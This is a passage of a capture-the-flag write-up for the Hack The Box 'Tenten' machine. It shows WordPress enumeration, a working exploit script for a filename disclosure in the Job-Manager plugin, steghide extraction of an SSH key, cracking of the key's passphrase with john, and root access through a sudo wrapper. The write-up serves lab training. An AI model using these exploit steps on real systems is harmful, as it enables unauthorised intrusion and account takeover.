<> (62 / 100) 62.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:01 <> (67 / 100) 67.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:01 <> (72 / 100) 72.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:01 <> (77 / 100) 77.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:01 <> (82 / 100) 82.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:01 <> (87 / 100) 87.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:01 <> (92 / 100) 92.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:01 <> (97 / 100) 97.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:01 <> (100 / 100) 100.00% Time: 00:00:01
[i] No Medias Found.
[+] Enumerating Users (via Aggressive Methods) Brute Forcing Author IDs - Time: 00:00:00 <==> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] takis
| Found By: Wp Json Api (Aggressive Detection) | - http://10.10.10.10/index.php/wp-json/wp/v2/users/?per_page=100&page=1 | Confirmed By: | Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Login Error Messages (Aggressive Detection)
[+] WPVulnDB API OK | Plan: free | Requests Done (during the scan): 3 | Requests Remaining: 47
[+] Finished: Tue Mar 10 16:23:34 2020 [+] Requests Done: 540 [+] Cached Requests: 7 [+] Data Sent: 122.725 KB [+] Data Received: 483.67 KB [+] Memory used: 205.129 MB [+] Elapsed time: 00:00:11

Searchexploit

u505@kali:~/HTB/Machines/Tenten$ searchsploit WordPress 4.7
----------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                     |  Path
                                                                                   | (/usr/share/exploitdb/)
----------------------------------------------------------------------------------- ----------------------------------------
WordPress 4.7.0/4.7.1 - Content Injection (Python)                                 | exploits/linux/webapps/41223.py
WordPress 4.7.0/4.7.1 - Content Injection (Ruby)                                   | exploits/linux/webapps/41224.rb
WordPress < 4.7.1 - Username Enumeration                                           | exploits/php/webapps/41497.php
WordPress < 4.7.4 - Unauthorized Password Reset                                    | exploits/linux/webapps/41963.txt
WordPress Plugin Cforms 14.7 - Remote Code Execution                               | exploits/php/webapps/35879.txt
WordPress Plugin Email Subscribers & Newsletters 3.4.7 - Information Disclosure    | exploits/php/webapps/43872.html
WordPress Plugin ProPlayer 4.7.7 - SQL Injection                                   | exploits/php/webapps/17616.txt
WordPress Plugin ProPlayer 4.7.9.1 - SQL Injection                                 | exploits/php/webapps/25605.txt
WordPress Plugin Quiz And Survey Master 4.5.4/4.7.8 - Cross-Site Request Forgery   | exploits/php/webapps/40934.html
WordPress Plugin RB Agency 2.4.7 - Local File Disclosure                           | exploits/php/webapps/40333.txt
WordPress Plugin TheCartPress 1.4.7 - Multiple Vulnerabilities                     | exploits/php/webapps/38869.txt
----------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result

CVE-2017-8295

This vulnerability, should send a reset password to our SMTP server.

u505@kali:~/HTB/Machines/Tenten$ sudo python -m smtpd -c DebuggingServer -n 10.10.14.21:25
[sudo] password for u505:

Once the SMTP lister is started, we create the HTTP frame, with our host.

u505@kali:~/HTB/Machines/Tenten$ nc 10.10.10.10 80
POST /wp-login.php?action=lostpassword HTTP/1.1
Host: 10.10.14.21
Content-Type: application/x-www-form-urlencoded
Content-Length: 56

user_login=takis&redirect_to=&wp-submit=Get+New+Password HTTP/1.1 500 Internal Server Error Date: Sun, 15 Mar 2020 03:29:36 GMT Server: Apache/2.4.18 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/ X-Frame-Options: SAMEORIGIN Content-Length: 3493 Connection: close Content-Type: text/html; charset=utf-8 <br> <!DOCTYPE html> <!-- Ticket #11289, IE bug fix: always pad the error page with enough characters such that it is greater than 512 bytes, even after gzip compression abcdefghijklmnopqrstuvwxyz1234567890aabbccddeeffgghhiijjkkllmmnnooppqqrrssttuuvvwwxxyyzz11223344556677889900abacbcbdcdcededfefegfgfhghgihihjijikjkjlklkmlmlnmnmononpopoqpqprqrqsrsrtstsubcbcdcdedefefgfabcadefbghicjkldmnoepqrfstugvwxhyz1i234j567k890laabmbccnddeoeffpgghqhiirjjksklltmmnunoovppqwqrrxsstytuuzvvw0wxx1yyz2z113223434455666777889890091abc2def3ghi4jkl5mno6pqr7stu8vwx9yz11aab2bcc3dd4ee5ff6gg7hh8ii9j0jk1kl2lmm3nnoo4p5pq6qrr7ss8tt9uuvv0wwx1x2yyzz13aba4cbcb5dcdc6dedfef8egf9gfh0ghg1ihi2hji3jik4jkj5lkl6kml7mln8mnm9ono --> <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="viewport" content="width=device-width"> <meta name='robots' content='noindex,follow' /> <title>WordPress › Error</title> <style type="text/css"> html { background: #f1f1f1; } body { background: #fff; color: #444; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif; margin: 2em auto; padding: 1em 2em; max-width: 700px; -webkit-box-shadow: 0 1px 3px rgba(0,0,0,0.13); box-shadow: 0 1px 3px rgba(0,0,0,0.13); } h1 { border-bottom: 1px solid #dadada; clear: both; color: #666; font-size: 24px; margin: 30px 0 0 0; padding: 0; padding-bottom: 7px; } #error-page { margin-top: 50px; } #error-page p { font-size: 14px; line-height: 1.5; margin: 25px 0 20px; } #error-page code { font-family: Consolas, Monaco, monospace; } ul li { margin-bottom: 10px; font-size: 14px ; } a { color: #0073aa; } a:hover, a:active { color: #00a0d2; } a:focus { color: #124964; -webkit-box-shadow: 0 0 0 1px #5b9dd9, 0 0 2px 1px rgba(30, 140, 190, .8); box-shadow: 0 0 0 1px #5b9dd9, 0 0 2px 1px rgba(30, 140, 190, .8); outline: none; } .button { background: #f7f7f7; border: 1px solid #ccc; color: #555; display: inline-block; text-decoration: none; font-size: 13px; line-height: 26px; height: 28px; margin: 0; padding: 0 10px 1px; cursor: pointer; -webkit-border-radius: 3px; -webkit-appearance: none; border-radius: 3px; white-space: nowrap; -webkit-box-sizing: border-box; -moz-box-sizing: border-box; box-sizing: border-box; <br> -webkit-box-shadow: 0 1px 0 #ccc; box-shadow: 0 1px 0 #ccc; vertical-align: top; } <br> .button.button-large { height: 30px; line-height: 28px; padding: 0 12px 2px; } <br> .button:hover, .button:focus { background: #fafafa; border-color: #999; color: #23282d; } <br> .button:focus { border-color: #5b9dd9; -webkit-box-shadow: 0 0 3px rgba( 0, 115, 170, .8 ); box-shadow: 0 0 3px rgba( 0, 115, 170, .8 ); outline: none; } <br> .button:active { background: #eee; border-color: #999; -webkit-box-shadow: inset 0 2px 5px -3px rgba( 0, 0, 0, 0.5 ); box-shadow: inset 0 2px 5px -3px rgba( 0, 0, 0, 0.5 ); -webkit-transform: translateY(1px); -ms-transform: translateY(1px); transform: translateY(1px); } <br> </style> </head> <body id="error-page"> <p>The email could not be sent.<br /> Possible reason: your host may have disabled the mail() function.</p></body> </html>

But it fails. The email is not sent.

CVE-2015-6668

This disclosure use a vulnerability on the Job_manager plugin. The main portal has a job listing link, so it seems a good clue to work on.

Tenten02.png

The link Job listing allows us to apply to this position.

Tenten03.png

The link is http://10.10.10.10/index.php/jobs/apply/8/, and we upload an image as our CV.

Tenten04.png

Following the exploit, we can list the wordpress documents browsing the URL http://10.10.10.10/index.php/jobs/apply/<WP_ID>/, and it give us the Title.

u505@kali:~/HTB/Machines/Tenten$ for i in `seq 1 20`; do echo -n "$i - "; curl -s http://10.10.10.10/index.php/jobs/apply/$i/ | grep '<title>'; done
1 - <title>Job Application: Hello world! – Job Portal</title>
2 - <title>Job Application: Sample Page – Job Portal</title>
3 - <title>Job Application: Auto Draft – Job Portal</title>
4 - <title>Job Application – Job Portal</title>
5 - <title>Job Application: Jobs Listing – Job Portal</title>
6 - <title>Job Application: Job Application – Job Portal</title>
7 - <title>Job Application: Register – Job Portal</title>
8 - <title>Job Application: Pen Tester – Job Portal</title>
9 - <title>Job Application:  – Job Portal</title>
10 - <title>Job Application: Application – Job Portal</title>
11 - <title>Job Application: cube – Job Portal</title>
12 - <title>Job Application: Application – Job Portal</title>
13 - <title>Job Application: HackerAccessGranted – Job Portal</title>
14 - <title>Job Application: Application – Job Portal</title>
15 - <title>Job Application: u505 – Job Portal</title>
16 - <title>Job Application – Job Portal</title>
17 - <title>Job Application – Job Portal</title>
18 - <title>Job Application – Job Portal</title>
19 - <title>Job Application – Job Portal</title>
20 - <title>Job Application – Job Portal</title>

On the number 15, we recognize our uploaded file, witch seems to be the last document of the WP database.

u505@kali:~/HTB/Machines/Tenten$ cat filename.py
import requests

print """ CVE-2015-6668 Title: CV filename disclosure on Job-Manager WP Plugin Author: Evangelos Mourikis Blog: https://vagmour.eu Plugin URL: http://www.wp-jobmanager.com Versions: <=0.7.25 """ website = raw_input('Enter a vulnerable website: ') filename = raw_input('Enter a file name: ')
filename2 = filename.replace(" ", "-")
for year in range(2017,2021): for i in range(1,13): for extension in {'doc','pdf','docx','png','jpg','jpeg'}: URL = website + "/wp-content/uploads/" + str(year) + "/" + "{:02}".format(i) + "/" + filename2 + "." + extension req = requests.get(URL) if req.status_code==200: print "[+] URL of CV found! " + URL

We reuse the python script from the exploit, updating the year ranges, and adding pictures extensions.

u505@kali:~/HTB/Machines/Tenten$ python filename.py

CVE-2015-6668 Title: CV filename disclosure on Job-Manager WP Plugin Author: Evangelos Mourikis Blog: https://vagmour.eu Plugin URL: http://www.wp-jobmanager.com Versions: <=0.7.25
Enter a vulnerable website: http://10.10.10.10 Enter a file name: u505 [+] URL of CV found! http://10.10.10.10/wp-content/uploads/2020/03/u505.png

It find our image

Tenten05.png

If we run it for the filename HackerAccessGranted.

u505@kali:~/HTB/Machines/Tenten$ python filename.py

CVE-2015-6668 Title: CV filename disclosure on Job-Manager WP Plugin Author: Evangelos Mourikis Blog: https://vagmour.eu Plugin URL: http://www.wp-jobmanager.com Versions: <=0.7.25
Enter a vulnerable website: http://10.10.10.10 Enter a file name: HackerAccessGranted [+] URL of CV found! http://10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg

We find the URL.

Tenten06.png

And we download the picture.

u505@kali:~/HTB/Machines/Tenten$ wget http://10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg
--2020-03-14 22:08:15--  http://10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg
Connecting to 10.10.10.10:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 262408 (256K) [image/jpeg]
Saving to: ‘HackerAccessGranted.jpg’

HackerAccessGranted 100%[===================>] 256.26K 172KB/s in 1.5s
2020-03-14 22:08:16 (172 KB/s) - ‘HackerAccessGranted.jpg’ saved [262408/262408]

Steganography

Nothing is found by strings command.

u505@kali:~/HTB/Machines/Tenten$ strings HackerAccessGranted.jpg

But a file is extracted by steghide without password.

u505@kali:~/HTB/Machines/Tenten$ steghide --extract -sf HackerAccessGranted.jpg
Enter passphrase:
wrote extracted data to "id_rsa".

The extracted file is an encrypted ssh private key.

u505@kali:~/HTB/Machines/Tenten$ file id_rsa
id_rsa: PEM RSA private key
u505@kali:~/HTB/Machines/Tenten$ cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,7265FC656C429769E4C1EEFC618E660C

/HXcUBOT3JhzblH7uF9Vh7faa76XHIdr/Ch0pDnJunjdmLS/laq1kulQ3/RF/Vax tjTzj/V5hBEcL5GcHv3esrODlS0jhML53lAprkpawfbvwbR+XxFIJuz7zLfd/vDo 1KuGrCrRRsipkyae5KiqlC137bmWK9aE/4c5X2yfVTOEeODdW0rAoTzGufWtThZf K2ny0iTGPndD7LMdm/o5O5As+ChDYFNphV1XDgfDzHgonKMC4iES7Jk8Gz20PJsm SdWCazF6pIEqhI4NQrnkd8kmKqzkpfWqZDz3+g6f49GYf97aM5TQgTday2oFqoXH ...

Passphrase crack

We extract the hash of the private key.

u505@kali:~/HTB/Machines/Tenten$ /usr/share/john/ssh2john.py id_rsa > id_rsa.hash

And we brute force it with john.

u505@kali:~/HTB/Machines/Tenten$ john -w=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt id_rsa.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 8 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
superpassword    (id_rsa)
Warning: Only 1 candidate left, minimum 8 needed for performance.
1g 0:00:00:02 DONE (2020-03-14 22:24) 0.4016g/s 5759Kp/s 5759Kc/s 5759KC/s *7¡Vamos!
Session completed

User Flag

The private key matches the user takis.

u505@kali:~/HTB/Machines/Tenten$ ssh -i id_rsa takis@10.10.10.10
The authenticity of host '10.10.10.10 (10.10.10.10)' can't be established.
ECDSA key fingerprint is SHA256:AxKIYOMkqGk3v+ZKgHEM6QcEDw8c8/qi1l0CMNSx8uQ.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.10' (ECDSA) to the list of known hosts.
Enter passphrase for key 'id_rsa':
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)

* Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage
65 packages can be updated. 39 updates are security updates.
Last login: Fri May 5 23:05:36 2017 takis@tenten:~$ cat user.txt <USER_FLAG>

Elevation of privileges

The flag file .sudo_as_admin_successful tells us that the user takis has sudo privileges.

takis@tenten:~$ ls -la
total 48
drwx------ 5 takis takis 4096 Apr 12  2017 .
drwxr-xr-x 5 root  root  4096 Apr 12  2017 ..
-rw------- 1 root  root     1 Dec 24  2017 .bash_history
-rw-r--r-- 1 takis takis  220 Apr 12  2017 .bash_logout
-rw-r--r-- 1 takis takis 3771 Apr 12  2017 .bashrc
drwx------ 2 takis takis 4096 Apr 12  2017 .cache
-rw------- 1 root  root   162 Apr 12  2017 .mysql_history
drwxrwxr-x 2 takis takis 4096 Apr 12  2017 .nano
-rw-r--r-- 1 takis takis  655 Apr 12  2017 .profile
drwx------ 2 takis takis 4096 Apr 12  2017 .ssh
-rw-r--r-- 1 takis takis    0 Apr 12  2017 .sudo_as_admin_successful
-r--r--r-- 1 takis takis   33 Apr 12  2017 user.txt
-rw-r--r-- 1 root  root   217 Apr 12  2017 .wget-hsts
takis@tenten:~$ sudo -l
Matching Defaults entries for takis on tenten:
   env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User takis may run the following commands on tenten: (ALL : ALL) ALL (ALL) NOPASSWD: /bin/fuckin

Takis can run the file /bin/fuckin as root without password.

takis@tenten:~$ ls -l /bin/fuckin
-rwxr-xr-x 1 root root 24 Apr 12  2017 /bin/fuckin
takis@tenten:~$ file /bin/fuckin
/bin/fuckin: Bourne-Again shell script, ASCII text executable

The file is a bourne shell, that execute the parameters passed.

takis@tenten:~$ cat /bin/fuckin
#!/bin/bash
$1 $2 $3 $4

So we can run it with the parameter bash

takis@tenten:~$ sudo /bin/fuckin bash
root@tenten:~# whoami
root

Root_Flag

root@tenten:~# cd /root/
root@tenten:/root# cat root.txt
<ROOT_FLAG>

References

Daniel Simao 22:44, 14 March 2020 (EDT)